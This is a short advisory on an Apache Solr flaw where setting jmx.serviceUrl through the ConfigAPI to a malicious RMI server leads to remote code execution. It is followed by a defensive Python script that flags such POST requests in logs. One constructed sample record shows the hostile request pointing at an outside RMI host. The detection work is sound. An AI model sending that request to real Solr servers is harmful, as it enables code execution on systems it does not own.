ASA-2019-00126 – Apache Solr: Deserialization of untrusted data via jmx.serviceUrl

The ConfigAPI allows Solr's JMX server to be configured via an HTTP POST request. By pointing it at a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
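
A defender-side check for the request described above, as an added example that is not part of the original advisory: it scans HTTP request records for POST bodies that set `jmx.serviceUrl` and flags any whose target host is not on an allowlist. The record schema, the sample records, the host names and the allowlist are constructed assumptions.

```python
import re

# Matches the jmx.serviceUrl property and its string value anywhere in a request body.
PROP_RE = re.compile(r'"jmx\.serviceUrl"\s*:\s*"([^"]*)"')
# Pulls each host out of a JMX service URL (the token that follows "://").
HOST_RE = re.compile(r'://([^/:\s"]+)')

def find_jmx_serviceurl_changes(records, allowed_hosts=frozenset()):
    """Return one finding per POST body that sets jmx.serviceUrl.

    records: iterable of dicts with 'src', 'method', 'path', 'body'
    (hypothetical log schema). A finding is an alert when the URL names
    a host outside allowed_hosts, or names no host at all.
    """
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for rec in records:
        if rec.get("method", "").upper() != "POST":
            continue
        for url in PROP_RE.findall(rec.get("body") or ""):
            hosts = {h.lower() for h in HOST_RE.findall(url)}
            unknown = sorted(hosts - allowed)
            findings.append({
                "src": rec.get("src"),
                "path": rec.get("path"),
                "url": url,
                "unknown_hosts": unknown,
                "alert": bool(unknown) or not hosts,
            })
    return findings

# Constructed sample records (not real traffic; bodies are simplified).
SAMPLE = [
    {"src": "10.0.0.5", "method": "POST", "path": "/solr/core1/config",
     "body": '{"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://jmx.internal.example:9999/solr"}'},
    {"src": "203.0.113.40", "method": "POST", "path": "/solr/core1/config",
     "body": '{"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://198.51.100.23:1099/obj"}'},
    {"src": "10.0.0.5", "method": "GET", "path": "/solr/core1/config", "body": ""},
    {"src": "10.0.0.8", "method": "POST", "path": "/solr/core1/config",
     "body": '{"updateHandler.autoCommit.maxTime": 15000}'},
]

if __name__ == "__main__":
    for f in find_jmx_serviceurl_changes(SAMPLE, {"jmx.internal.example"}):
        print("ALERT" if f["alert"] else "ok", f["src"], f["path"], f["url"])
```

With an empty allowlist every request that sets the property is reported, which suits deployments where JMX is never reconfigured over HTTP.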